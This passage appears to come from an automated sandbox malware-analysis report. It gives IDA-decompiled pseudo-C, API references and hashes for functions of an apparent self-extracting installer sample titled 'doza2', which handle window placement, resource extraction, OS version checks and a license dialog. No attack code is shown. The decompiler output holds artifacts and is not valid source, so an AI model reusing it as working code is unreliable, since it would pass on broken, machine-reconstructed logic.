    _v60 = GetDeviceCaps(_t69, 0xa);
    ReleaseDC(_v44, _t69);
    _t56 = _v48;
    asm("cdq");
    _t72 = (_v24.right - _v24.left - _t56 - _t63 >> 1) + _v24.left;
    _t67 = 0;
    if(_t72 >= 0) {
        _t63 = _v52;
        if(_t72 + _t56 > _t63) {
            _t72 = _t63 - _t56;
        }
    } else {
        _t72 = _t67;
    }
    asm("cdq");
    _t59 = (_v56 - _t53 - _t63 >> 1) + _v24.top;
    if(_t59 >= 0) {
        _t63 = _v60;
        if(_t59 + _t53 > _t63) {
            _t59 = _t63 - _t53;
        }
    } else {
        _t59 = _t67;
    }
    return E010B6CE0(SetWindowPos(_v44, _t67, _t72, _t59, _t67, _t67, 5), _t53, _v8 ^ _t74, _t63, _t67, _t72);
}

APIs
• GetWindowRect.USER32(?,?), ref: 010B43F1
• GetWindowRect.USER32(00000000,?), ref: 010B440B
• GetDC.USER32(?), ref: 010B4423
• GetDeviceCaps.GDI32(00000000,00000008), ref: 010B442E
• GetDeviceCaps.GDI32(00000000,0000000A), ref: 010B443A
• ReleaseDC.USER32(?,00000000), ref: 010B4447
• SetWindowPos.USER32(?,00000000,?,?,00000000,00000000,00000005,?,?), ref: 010B44A2
Memory Dump Source
• Source File: 00000001.00000002.437433001.00000000010B1000.00000020.00000001.01000000.00000004.sdmp, Offset: 010B0000, based on PE: true
• Associated: 00000001.00000002.437414550.00000000010B0000.00000002.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.437491566.00000000010B8000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.437501771.00000000010BA000.00000002.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.437501771.00000000010BC000.00000002.00000001.01000000.00000004.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_1_2_10b0000_kino0095.jbxd
Similarity
• API ID: Window$CapsDeviceRect$Release
• String ID:
• API String ID: 2212493051-0
• Opcode ID: 94bd9b41fda92bae85df972a46110e44af811464e8cda3beb2907b6617d5160a
• Instruction ID: dc858a4a827c082621aee92bff48de1532f431750506327edc694fc7c579cbf2
• Opcode Fuzzy Hash: 94bd9b41fda92bae85df972a46110e44af811464e8cda3beb2907b6617d5160a
• Instruction Fuzzy Hash: 49313E32F00119AFCB14CFB8D9889EEBBB5EB89310F154569F846F7244EB356D058B60
Uniqueness

Uniqueness Score: -1.00%

C-Code - Quality: 53%
                                                                                                                                                                                                                                    			E010B6298(intOrPtr __ecx, intOrPtr* __edx) {
                                                                                                                                                                                                                                    				signed int _v8;
                                                                                                                                                                                                                                    				char _v28;
                                                                                                                                                                                                                                    				intOrPtr _v32;
                                                                                                                                                                                                                                    				struct HINSTANCE__* _v36;
                                                                                                                                                                                                                                    				void* __ebx;
                                                                                                                                                                                                                                    				void* __edi;
                                                                                                                                                                                                                                    				void* __esi;
                                                                                                                                                                                                                                    				signed int _t16;
                                                                                                                                                                                                                                    				struct HRSRC__* _t21;
                                                                                                                                                                                                                                    				intOrPtr _t26;
                                                                                                                                                                                                                                    				void* _t30;
                                                                                                                                                                                                                                    				struct HINSTANCE__* _t36;
                                                                                                                                                                                                                                    				intOrPtr* _t40;
                                                                                                                                                                                                                                    				void* _t41;
                                                                                                                                                                                                                                    				intOrPtr* _t44;
                                                                                                                                                                                                                                    				intOrPtr* _t45;
                                                                                                                                                                                                                                    				void* _t47;
                                                                                                                                                                                                                                    				signed int _t50;
                                                                                                                                                                                                                                    				struct HINSTANCE__* _t51;
                                                                                                                                                                                                                                    
                                                                                                                                                                                                                                    				_t44 = __edx;
                                                                                                                                                                                                                                    				_t16 =  *0x10b8004; // 0x72151d89
                                                                                                                                                                                                                                    				_v8 = _t16 ^ _t50;
                                                                                                                                                                                                                                    				_t46 = 0;
                                                                                                                                                                                                                                    				_v32 = __ecx;
                                                                                                                                                                                                                                    				_v36 = 0;
                                                                                                                                                                                                                                    				_t36 = 1;
                                                                                                                                                                                                                                    				E010B171E( &_v28, 0x14, "UPDFILE%lu", 0);
                                                                                                                                                                                                                                    				while(1) {
                                                                                                                                                                                                                                    					_t51 = _t51 + 0x10;
                                                                                                                                                                                                                                    					_t21 = FindResourceA(_t46,  &_v28, 0xa);
                                                                                                                                                                                                                                    					if(_t21 == 0) {
                                                                                                                                                                                                                                    						break;
                                                                                                                                                                                                                                    					}
                                                                                                                                                                                                                                    					_t45 = LockResource(LoadResource(_t46, _t21));
                                                                                                                                                                                                                                    					if(_t45 == 0) {
                                                                                                                                                                                                                                    						 *0x10b9124 = 0x80070714;
                                                                                                                                                                                                                                    						_t36 = _t46;
                                                                                                                                                                                                                                    					} else {
                                                                                                                                                                                                                                    						_t5 = _t45 + 8; // 0x8
                                                                                                                                                                                                                                    						_t44 = _t5;
                                                                                                                                                                                                                                    						_t40 = _t44;
                                                                                                                                                                                                                                    						_t6 = _t40 + 1; // 0x9
                                                                                                                                                                                                                                    						_t47 = _t6;
                                                                                                                                                                                                                                    						do {
                                                                                                                                                                                                                                    							_t26 =  *_t40;
                                                                                                                                                                                                                                    							_t40 = _t40 + 1;
                                                                                                                                                                                                                                    						} while (_t26 != 0);
                                                                                                                                                                                                                                    						_t41 = _t40 - _t47;
                                                                                                                                                                                                                                    						_t46 = _t51;
                                                                                                                                                                                                                                    						_t7 = _t41 + 1; // 0xa
                                                                                                                                                                                                                                    						 *0x10ba288( *_t45,  *((intOrPtr*)(_t45 + 4)), _t44, _t7 + _t44);
                                                                                                                                                                                                                                    						_t30 = _v32();
                                                                                                                                                                                                                                    						if(_t51 != _t51) {
                                                                                                                                                                                                                                    							asm("int 0x29");
                                                                                                                                                                                                                                    						}
                                                                                                                                                                                                                                    						_push(_t45);
                                                                                                                                                                                                                                    						if(_t30 == 0) {
                                                                                                                                                                                                                                    							_t36 = 0;
                                                                                                                                                                                                                                    							FreeResource(??);
                                                                                                                                                                                                                                    						} else {
                                                                                                                                                                                                                                    							FreeResource();
                                                                                                                                                                                                                                    							_v36 = _v36 + 1;
                                                                                                                                                                                                                                    							E010B171E( &_v28, 0x14, "UPDFILE%lu", _v36 + 1);
                                                                                                                                                                                                                                    							_t46 = 0;
                                                                                                                                                                                                                                    							continue;
                                                                                                                                                                                                                                    						}
                                                                                                                                                                                                                                    					}
                                                                                                                                                                                                                                    					L12:
                                                                                                                                                                                                                                    					return E010B6CE0(_t36, _t36, _v8 ^ _t50, _t44, _t45, _t46);
                                                                                                                                                                                                                                    				}
                                                                                                                                                                                                                                    				goto L12;
                                                                                                                                                                                                                                    			}
Instruction addresses shown in the report beside the listing above, in listing order (0x00000000 marks a line with no instruction of its own):
0x010b6298 0x010b62a0 0x010b62a7 0x010b62ad 0x010b62af 0x010b62bb 0x010b62c3 0x010b62c4
0x010b633b 0x010b633b 0x010b6345 0x010b634d 0x00000000 0x00000000 0x010b62da 0x010b62de
0x010b635f 0x010b6369 0x010b62e0 0x010b62e0 0x010b62e0 0x010b62e3 0x010b62e5 0x010b62e5
0x010b62e8 0x010b62e8 0x010b62ea 0x010b62eb 0x010b62ef 0x010b62f1 0x010b62f3 0x010b6302
0x010b6308 0x010b630d 0x010b6314 0x010b6314 0x010b6316 0x010b6319 0x010b6355 0x010b6357
0x010b631b 0x010b631b 0x010b6331 0x010b6334 0x010b6339 0x00000000 0x010b6339 0x010b6319
0x010b636b 0x010b637d 0x010b637d 0x00000000

APIs
• Part of subcall function 010B171E: _vsnprintf.MSVCRT ref: 010B1750
• LoadResource.KERNEL32(00000000,00000000,?,?,00000002,00000000,?,010B51CA,00000004,00000024,010B2F71,?,00000002,00000000), ref: 010B62CD
• LockResource.KERNEL32(00000000,?,?,00000002,00000000,?,010B51CA,00000004,00000024,010B2F71,?,00000002,00000000), ref: 010B62D4
• FreeResource.KERNEL32(00000000,?,?,00000002,00000000,?,010B51CA,00000004,00000024,010B2F71,?,00000002,00000000), ref: 010B631B
• FindResourceA.KERNEL32(00000000,00000004,0000000A), ref: 010B6345
• FreeResource.KERNEL32(00000000,?,?,00000002,00000000,?,010B51CA,00000004,00000024,010B2F71,?,00000002,00000000), ref: 010B6357
Strings
Memory Dump Source
• Source File: 00000001.00000002.437433001.00000000010B1000.00000020.00000001.01000000.00000004.sdmp, Offset: 010B0000, based on PE: true
• Associated: 00000001.00000002.437414550.00000000010B0000.00000002.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.437491566.00000000010B8000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.437501771.00000000010BA000.00000002.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.437501771.00000000010BC000.00000002.00000001.01000000.00000004.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_1_2_10b0000_kino0095.jbxd
Similarity
• API ID: Resource$Free$FindLoadLock_vsnprintf
• String ID: UPDFILE%lu
• API String ID: 2922116661-2329316264
• Opcode ID: 259b80cd3493e3c447a795c73554622c1d3efe195474f5472c4dac8c28a1a502
• Instruction ID: 0d04427d2cb33a3e14b6831ba8e36e5f29ba16d6e948abffa3cbe75a23f7bb73
• Opcode Fuzzy Hash: 259b80cd3493e3c447a795c73554622c1d3efe195474f5472c4dac8c28a1a502
• Instruction Fuzzy Hash: AB21D875A01219AFDB209F64DCC59FE7B78FF44714B004169FA82A3201D73B99028BE0
Uniqueness

Uniqueness Score: -1.00%

C-Code - Quality: 94%
E010B681F(void* __ebx) {
	signed int _v8;
	char _v20;
	struct _OSVERSIONINFOA _v168;
	void* _v172;
	int* _v176;
	int _v180;
	int _v184;
	void* __edi;
	void* __esi;
	signed int _t19;
	long _t31;
	signed int _t35;
	void* _t36;
	intOrPtr _t41;
	signed int _t44;

	_t36 = __ebx;
	_t19 =  *0x10b8004; // 0x72151d89
	_v8 = _t19 ^ _t44;
	_t41 =  *0x10b81d8; // 0x0
	_t43 = 0;
	_v180 = 0xc;
	_v176 = 0;
	if(_t41 == 0xfffffffe) {
		 *0x10b81d8 = 0;
		_v168.dwOSVersionInfoSize = 0x94;
		if(GetVersionExA( &_v168) == 0) {
			L12:
			_t41 =  *0x10b81d8; // 0x0
		} else {
			_t41 = 1;
			if(_v168.dwPlatformId != 1 || _v168.dwMajorVersion != 4 || _v168.dwMinorVersion >= 0xa || GetSystemMetrics(0x4a) == 0 || RegOpenKeyExA(0x80000001, "Control Panel\\Desktop\\ResourceLocale", 0, 0x20019,  &_v172) != 0) {
				goto L12;
			} else {
				_t31 = RegQueryValueExA(_v172, 0x10b1140, 0,  &_v184,  &_v20,  &_v180);
				_t43 = _t31;
				RegCloseKey(_v172);
				if(_t31 != 0) {
					goto L12;
				} else {
					_t40 =  &_v176;
					if(E010B66F9( &_v20,  &_v176) == 0) {
						goto L12;
					} else {
						_t35 = _v176 & 0x000003ff;
						if(_t35 == 1 || _t35 == 0xd) {
							 *0x10b81d8 = _t41;
						} else {
							goto L12;
						}
					}
				}
			}
		}
	}
	return E010B6CE0(_t41, _t36, _v8 ^ _t44, _t40, _t41, _t43);
}


















                                                                                                                                                                                                                                    0x010b681f
                                                                                                                                                                                                                                    0x010b682a
                                                                                                                                                                                                                                    0x010b6831
                                                                                                                                                                                                                                    0x010b6836
                                                                                                                                                                                                                                    0x010b683c
                                                                                                                                                                                                                                    0x010b683e
                                                                                                                                                                                                                                    0x010b6848
                                                                                                                                                                                                                                    0x010b6851
                                                                                                                                                                                                                                    0x010b685d
                                                                                                                                                                                                                                    0x010b6864
                                                                                                                                                                                                                                    0x010b6876
                                                                                                                                                                                                                                    0x010b693a
                                                                                                                                                                                                                                    0x010b693a
                                                                                                                                                                                                                                    0x010b687c
                                                                                                                                                                                                                                    0x010b687e
                                                                                                                                                                                                                                    0x010b6885
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x010b68d6
                                                                                                                                                                                                                                    0x010b68f4
                                                                                                                                                                                                                                    0x010b6900
                                                                                                                                                                                                                                    0x010b6902
                                                                                                                                                                                                                                    0x010b690a
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x010b690c
                                                                                                                                                                                                                                    0x010b690c
                                                                                                                                                                                                                                    0x010b691c
Instruction addresses: 0x00000000, 0x010b691e, 0x010b6924, 0x010b692b, 0x010b6932, 0x00000000, 0x00000000, 0x00000000, 0x010b692b, 0x010b691c, 0x010b690a, 0x010b6885, 0x010b6876, 0x010b6951

APIs
• GetVersionExA.KERNEL32(?,00000000,00000002), ref: 010B686E
• GetSystemMetrics.USER32(0000004A), ref: 010B68A7
• RegOpenKeyExA.ADVAPI32(80000001,Control Panel\Desktop\ResourceLocale,00000000,00020019,?), ref: 010B68CC
• RegQueryValueExA.ADVAPI32(?,010B1140,00000000,?,?,0000000C), ref: 010B68F4
• RegCloseKey.ADVAPI32(?), ref: 010B6902
  • Part of subcall function 010B66F9: CharNextA.USER32(?,00000001,00000000,00000000,?,?,?,010B691A), ref: 010B6741
Strings
• Control Panel\Desktop\ResourceLocale, xrefs: 010B68C2
Memory Dump Source
• Source File: 00000001.00000002.437433001.00000000010B1000.00000020.00000001.01000000.00000004.sdmp, Offset: 010B0000, based on PE: true
• Associated: 00000001.00000002.437414550.00000000010B0000.00000002.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.437491566.00000000010B8000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.437501771.00000000010BA000.00000002.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.437501771.00000000010BC000.00000002.00000001.01000000.00000004.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_1_2_10b0000_kino0095.jbxd
Similarity
• API ID: CharCloseMetricsNextOpenQuerySystemValueVersion
• String ID: Control Panel\Desktop\ResourceLocale
• API String ID: 3346862599-1109908249
• Opcode ID: de3e85832d10f640637a191b2ec6c0e0607a77a217b584305e3ae3e36e9ce6a9
• Instruction ID: eed12382a8ca34f06bee008acfba43c6fef3ce89d85d5cdc37156dc56e457b93
• Opcode Fuzzy Hash: de3e85832d10f640637a191b2ec6c0e0607a77a217b584305e3ae3e36e9ce6a9
• Instruction Fuzzy Hash: FA31BF31A01228DFDB31CB19DC84BEAB7BCEB45768F0041E5E9C9A2240D7369A85CF55
Uniqueness
Uniqueness Score: -1.00%

C-Code - Quality: 100%
E010B3A3F(void* __eflags) {
	void* _t3;
	void* _t9;
	CHAR* _t16;

	_t16 = "LICENSE";
	_t1 = E010B468F(_t16, 0, 0) + 1; // 0x1
	_t3 = LocalAlloc(0x40, _t1);
	 *0x10b8d4c = _t3;
	if(_t3 != 0) {
		_t19 = _t16;
		if(E010B468F(_t16, _t3, _t28) != 0) {
			if(lstrcmpA( *0x10b8d4c, "<None>") == 0) {
				LocalFree( *0x10b8d4c);
				L9:
				 *0x10b9124 = 0;
				return 1;
			}
			_t9 = E010B6517(_t19, 0x7d1, 0, E010B3100, 0, 0);
			LocalFree( *0x10b8d4c);
			if(_t9 != 0) {
				goto L9;
			}
			 *0x10b9124 = 0x800704c7;
			L2:
			return 0;
		}
		E010B44B9(0, 0x4b1, 0, 0, 0x10, 0);
		LocalFree( *0x10b8d4c);
		 *0x10b9124 = 0x80070714;
		goto L2;
	}
	E010B44B9(0, 0x4b5, 0, 0, 0x10, 0);
	 *0x10b9124 = E010B6285();
	goto L2;
}

Instruction addresses: 0x010b3a46, 0x010b3a57, 0x010b3a5d, 0x010b3a63, 0x010b3a6a, 0x010b3a91, 0x010b3a9a, 0x010b3ad8, 0x010b3b13, 0x010b3b19, 0x010b3b1b, 0x00000000, 0x010b3b21, 0x010b3ae7, 0x010b3af4, 0x010b3afc, 0x00000000, 0x00000000, 0x010b3afe, 0x010b3a87, 0x00000000, 0x010b3a87, 0x010b3aa8, 0x010b3ab3, 0x010b3ab9, 0x00000000, 0x010b3ab9, 0x010b3a78, 0x010b3a82, 0x00000000

                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                      • Part of subcall function 010B468F: FindResourceA.KERNEL32(00000000,TITLE,0000000A), ref: 010B46A0
                                                                                                                                                                                                                                      • Part of subcall function 010B468F: SizeofResource.KERNEL32(00000000,00000000,?,010B2D1A,0000007F,?,?,?,?,?,?,?,00000002,00000000), ref: 010B46A9
                                                                                                                                                                                                                                      • Part of subcall function 010B468F: FindResourceA.KERNEL32(00000000,TITLE,0000000A), ref: 010B46C3
                                                                                                                                                                                                                                      • Part of subcall function 010B468F: LoadResource.KERNEL32(00000000,00000000,?,010B2D1A,0000007F,?,?,?,?,?,?,?,00000002,00000000), ref: 010B46CC
                                                                                                                                                                                                                                      • Part of subcall function 010B468F: LockResource.KERNEL32(00000000,?,010B2D1A,0000007F,?,?,?,?,?,?,?,00000002,00000000), ref: 010B46D3
                                                                                                                                                                                                                                      • Part of subcall function 010B468F: memcpy_s.MSVCRT ref: 010B46E5
                                                                                                                                                                                                                                      • Part of subcall function 010B468F: FreeResource.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,00000002,00000000), ref: 010B46EF
                                                                                                                                                                                                                                    • LocalAlloc.KERNEL32(00000040,00000001,00000000,?,00000002,00000000,010B2F64,?,00000002,00000000), ref: 010B3A5D
                                                                                                                                                                                                                                    • LocalFree.KERNEL32(00000000,00000000,00000010,00000000,00000000), ref: 010B3AB3
                                                                                                                                                                                                                                      • Part of subcall function 010B44B9: LoadStringA.USER32(000004B1,?,00000200,00000000), ref: 010B4518
                                                                                                                                                                                                                                      • Part of subcall function 010B44B9: MessageBoxA.USER32(?,?,doza2,00010010), ref: 010B4554
                                                                                                                                                                                                                                      • Part of subcall function 010B6285: GetLastError.KERNEL32(010B5BBC), ref: 010B6285
                                                                                                                                                                                                                                    • lstrcmpA.KERNEL32(<None>,00000000), ref: 010B3AD0
                                                                                                                                                                                                                                    • LocalFree.KERNEL32 ref: 010B3B13
                                                                                                                                                                                                                                      • Part of subcall function 010B6517: FindResourceA.KERNEL32(010B0000,000007D6,00000005), ref: 010B652A
                                                                                                                                                                                                                                      • Part of subcall function 010B6517: LoadResource.KERNEL32(010B0000,00000000,?,?,010B2EE8,00000000,010B19E0,00000547,0000083E,?,?,?,?,?,?,?), ref: 010B6538
                                                                                                                                                                                                                                      • Part of subcall function 010B6517: DialogBoxIndirectParamA.USER32(010B0000,00000000,00000547,010B19E0,00000000), ref: 010B6557
                                                                                                                                                                                                                                      • Part of subcall function 010B6517: FreeResource.KERNEL32(00000000,?,?,010B2EE8,00000000,010B19E0,00000547,0000083E,?,?,?,?,?,?,?,00000002), ref: 010B6560
                                                                                                                                                                                                                                    • LocalFree.KERNEL32(00000000,010B3100,00000000,00000000), ref: 010B3AF4
                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                    • Source File: 00000001.00000002.437433001.00000000010B1000.00000020.00000001.01000000.00000004.sdmp, Offset: 010B0000, based on PE: true
• Associated: 00000001.00000002.437414550.00000000010B0000.00000002.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.437491566.00000000010B8000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.437501771.00000000010BA000.00000002.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.437501771.00000000010BC000.00000002.00000001.01000000.00000004.sdmp
                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                    • Snapshot File: hcaresult_1_2_10b0000_kino0095.jbxd
                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                    • API ID: Resource$Free$Local$FindLoad$AllocDialogErrorIndirectLastLockMessageParamSizeofStringlstrcmpmemcpy_s
                                                                                                                                                                                                                                    • String ID: <None>$LICENSE
                                                                                                                                                                                                                                    • API String ID: 2414642746-383193767
                                                                                                                                                                                                                                    • Opcode ID: 561c94a5488a3e7d0dd9f28674779ab2fdd1ca48dad93b51ebcfd591bf0912fe
                                                                                                                                                                                                                                    • Instruction ID: 39a646ffc835db6991bd258ac55e62fe1e81620ed41200e8fd51e43f98e6fb26
                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 561c94a5488a3e7d0dd9f28674779ab2fdd1ca48dad93b51ebcfd591bf0912fe
                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: D2117570700201ABD7746B26ACC8EDB3ABDEFD5740B20442FB6C6EA259DA7F84108764
                                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                                    C-Code - Quality: 94%
                                                                                                                                                                                                                                    			E010B24E0(void* __ebx) {
                                                                                                                                                                                                                                    				signed int _v8;
                                                                                                                                                                                                                                    				char _v268;
                                                                                                                                                                                                                                    				void* __edi;
                                                                                                                                                                                                                                    				void* __esi;
                                                                                                                                                                                                                                    				signed int _t7;
                                                                                                                                                                                                                                    				void* _t20;
                                                                                                                                                                                                                                    				long _t26;
                                                                                                                                                                                                                                    				signed int _t27;
                                                                                                                                                                                                                                    
                                                                                                                                                                                                                                    				_t20 = __ebx;
                                                                                                                                                                                                                                    				_t7 =  *0x10b8004; // 0x72151d89
                                                                                                                                                                                                                                    				_v8 = _t7 ^ _t27;
                                                                                                                                                                                                                                    				_t25 = 0x104;
                                                                                                                                                                                                                                    				_t26 = 0;
                                                                                                                                                                                                                                    				if(GetWindowsDirectoryA( &_v268, 0x104) != 0) {
                                                                                                                                                                                                                                    					E010B658A( &_v268, 0x104, "wininit.ini");
                                                                                                                                                                                                                                    					WritePrivateProfileStringA(0, 0, 0,  &_v268);
                                                                                                                                                                                                                                    					_t25 = _lopen( &_v268, 0x40);
                                                                                                                                                                                                                                    					if(_t25 != 0xffffffff) {
                                                                                                                                                                                                                                    						_t26 = _llseek(_t25, 0, 2);
                                                                                                                                                                                                                                    						_lclose(_t25);
                                                                                                                                                                                                                                    					}
                                                                                                                                                                                                                                    				}
                                                                                                                                                                                                                                    				return E010B6CE0(_t26, _t20, _v8 ^ _t27, 0x104, _t25, _t26);
                                                                                                                                                                                                                                    			}

Instruction addresses of the decompiled statements above (address column of the listing): 0x010b24e0, 0x010b24eb, 0x010b24f2, 0x010b24f7, 0x010b2504, 0x010b250e, 0x010b251d, 0x010b252c, 0x010b2541, 0x010b2546, 0x010b2553, 0x010b2555, 0x010b2555, 0x010b2546, 0x010b256c

                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                    • GetWindowsDirectoryA.KERNEL32(?,00000104,00000000,00000000), ref: 010B2506
                                                                                                                                                                                                                                    • WritePrivateProfileStringA.KERNEL32(00000000,00000000,00000000,?), ref: 010B252C
                                                                                                                                                                                                                                    • _lopen.KERNEL32(?,00000040), ref: 010B253B
                                                                                                                                                                                                                                    • _llseek.KERNEL32(00000000,00000000,00000002), ref: 010B254C
                                                                                                                                                                                                                                    • _lclose.KERNEL32(00000000), ref: 010B2555
                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                    • Source File: 00000001.00000002.437433001.00000000010B1000.00000020.00000001.01000000.00000004.sdmp, Offset: 010B0000, based on PE: true
• Associated: 00000001.00000002.437414550.00000000010B0000.00000002.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.437491566.00000000010B8000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.437501771.00000000010BA000.00000002.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.437501771.00000000010BC000.00000002.00000001.01000000.00000004.sdmp
                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                    • Snapshot File: hcaresult_1_2_10b0000_kino0095.jbxd
                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                    • API ID: DirectoryPrivateProfileStringWindowsWrite_lclose_llseek_lopen
                                                                                                                                                                                                                                    • String ID: wininit.ini
                                                                                                                                                                                                                                    • API String ID: 3273605193-4206010578
                                                                                                                                                                                                                                    • Opcode ID: a7b24b1c660e7982a1079e6984b7bd3a9bb83253ca87af6d17cd6f0cd0a3d16a
                                                                                                                                                                                                                                    • Instruction ID: a8bbf717cc845306821d134b5a950d97684b772a86bcfd2dd89f59219c838c5d
                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: a7b24b1c660e7982a1079e6984b7bd3a9bb83253ca87af6d17cd6f0cd0a3d16a
                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: CC017532700118A7D7709A699C8CEDF7BBCDB55750F000195FAC9D3184DB799A55CBA0
                                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                                    C-Code - Quality: 75%
                                                                                                                                                                                                                                    			E010B36EE(CHAR* __ecx) {
                                                                                                                                                                                                                                    				signed int _v8;
                                                                                                                                                                                                                                    				char _v268;
                                                                                                                                                                                                                                    				struct _OSVERSIONINFOA _v416;
                                                                                                                                                                                                                                    				signed int _v420;
                                                                                                                                                                                                                                    				signed int _v424;
                                                                                                                                                                                                                                    				CHAR* _v428;
                                                                                                                                                                                                                                    				CHAR* _v432;
                                                                                                                                                                                                                                    				signed int _v436;
                                                                                                                                                                                                                                    				CHAR* _v440;
                                                                                                                                                                                                                                    				void* __ebx;
                                                                                                                                                                                                                                    				void* __edi;
                                                                                                                                                                                                                                    				void* __esi;
                                                                                                                                                                                                                                    				signed int _t72;
                                                                                                                                                                                                                                    				CHAR* _t77;
                                                                                                                                                                                                                                    				CHAR* _t91;
                                                                                                                                                                                                                                    				CHAR* _t94;
                                                                                                                                                                                                                                    				int _t97;
                                                                                                                                                                                                                                    				CHAR* _t98;
                                                                                                                                                                                                                                    				signed char _t99;
                                                                                                                                                                                                                                    				CHAR* _t104;
                                                                                                                                                                                                                                    				signed short _t107;
                                                                                                                                                                                                                                    				signed int _t109;
                                                                                                                                                                                                                                    				short _t113;
                                                                                                                                                                                                                                    				void* _t114;
                                                                                                                                                                                                                                    				signed char _t115;
short _t119;
CHAR* _t123;
CHAR* _t124;
CHAR* _t129;
signed int _t131;
signed int _t132;
CHAR* _t135;
CHAR* _t138;
signed int _t139;

_t72 =  *0x10b8004; // 0x72151d89
_v8 = _t72 ^ _t139; // MSVC /GS stack cookie, checked again on return
_v416.dwOSVersionInfoSize = 0x94; // sizeof(OSVERSIONINFOA)
_t115 = __ecx;
_t135 = 0;
_v432 = __ecx;
_t138 = 0;
if(GetVersionExA( &_v416) != 0) {
	_t133 = _v416.dwMajorVersion;
	_t119 = 2;
	_t77 = _v416.dwPlatformId - 1; // dwPlatformId == 1 is VER_PLATFORM_WIN32_WINDOWS (Win9x/Me)
	__eflags = _t77;
	if(_t77 == 0) {
		_t119 = 0;
		__eflags = 1;
		 *0x10b8184 = 1;
		 *0x10b8180 = 1;
		L13:
		 *0x10b9a40 = _t119;
		L14:
		__eflags =  *0x10b8a34 - _t138; // 0x0
		if(__eflags != 0) {
			goto L66;
		}
		__eflags = _t115;
		if(_t115 == 0) {
			goto L66;
		}
		_v428 = _t135;
		__eflags = _t119;
		_t115 = _t115 + ((0 | _t119 != 0x00000000) - 0x00000001 & 0x0000003c) + 4;
		_t11 =  &_v420;
		 *_t11 = _v420 & _t138;
		__eflags =  *_t11;
		_v440 = _t115;
		do {
			// each table entry is 0x18 bytes; the two calls compare the running
			// OS major/minor version against the entry's low and high bounds
			_v424 = _t135 * 0x18;
			_v436 = E010B2A89(_v416.dwMajorVersion, _v416.dwMinorVersion,  *((intOrPtr*)(_t135 * 0x18 + _t115)),  *((intOrPtr*)(_t135 * 0x18 + _t115 + 4)));
			_t91 = E010B2A89(_v416.dwMajorVersion, _v416.dwMinorVersion,  *((intOrPtr*)(_v424 + _t115 + 0xc)),  *((intOrPtr*)(_v424 + _t115 + 0x10)));
			_t123 = _v436;
			_t133 = 0x54d;
			__eflags = _t123;
			if(_t123 < 0) {
				L32:
				__eflags = _v420 - 1;
				if(_v420 == 1) {
					_t138 = 0x54c;
					L36:
					__eflags = _t138;
					if(_t138 != 0) {
						L40:
						__eflags = _t138 - _t133;
						if(_t138 == _t133) {
							L30:
							_v420 = _v420 & 0x00000000;
							_t115 = 0;
							_v436 = _v436 & 0x00000000;
							__eflags = _t138 - _t133;
							_t133 = _v432;
							if(__eflags != 0) {
								_t124 = _v440;
							} else {
								_t124 = _t133[0x80] + 0x84 + _t135 * 0x3c + _t133;
								_v420 =  &_v268;
							}
							__eflags = _t124;
							if(_t124 == 0) {
								_t135 = _v436;
							} else {
								_t99 = _t124[0x30];
								_t135 = _t124[0x34] + 0x84 + _t133; // message text pointer for the MessageBox below
								__eflags = _t99 & 0x00000001;
								if((_t99 & 0x00000001) == 0) {
									asm("sbb ebx, ebx");
									_t115 =  ~(_t99 & 2) & 0x00000101;
								} else {
									_t115 = 0x104; // MB_YESNO | MB_DEFBUTTON2
								}
							}
							__eflags =  *0x10b8a38 & 0x00000001;
							if(( *0x10b8a38 & 0x00000001) != 0) {
								L64:
								_push(0);
								_push(0x30);
								_push(_v420);
								_push("doza2");
								goto L65;
							} else {
								__eflags = _t135;
								if(_t135 == 0) {
									goto L64;
								}
								__eflags =  *_t135;
								if( *_t135 == 0) {
									goto L64;
								}
								MessageBeep(0);
								_t94 = E010B681F(_t115);
								__eflags = _t94;
								if(_t94 == 0) {
									L57:
									0x180030 = 0x30;
									L58:
									// 0x00180030 == MB_RTLREADING | MB_RIGHT | MB_ICONEXCLAMATION; _t115 carries the button style
									_t97 = MessageBoxA(0, _t135, "doza2", 0x00180030 | _t115);
									__eflags = _t115 & 0x00000004;
									if((_t115 & 0x00000004) == 0) {
										__eflags = _t115 & 0x00000001;
										if((_t115 & 0x00000001) == 0) {
											goto L66;
										}
										__eflags = _t97 - 1; // IDOK
										L62:
										if(__eflags == 0) {
											_t138 = 0;
										}
										goto L66;
									}
									__eflags = _t97 - 6; // IDYES
									goto L62;
								}
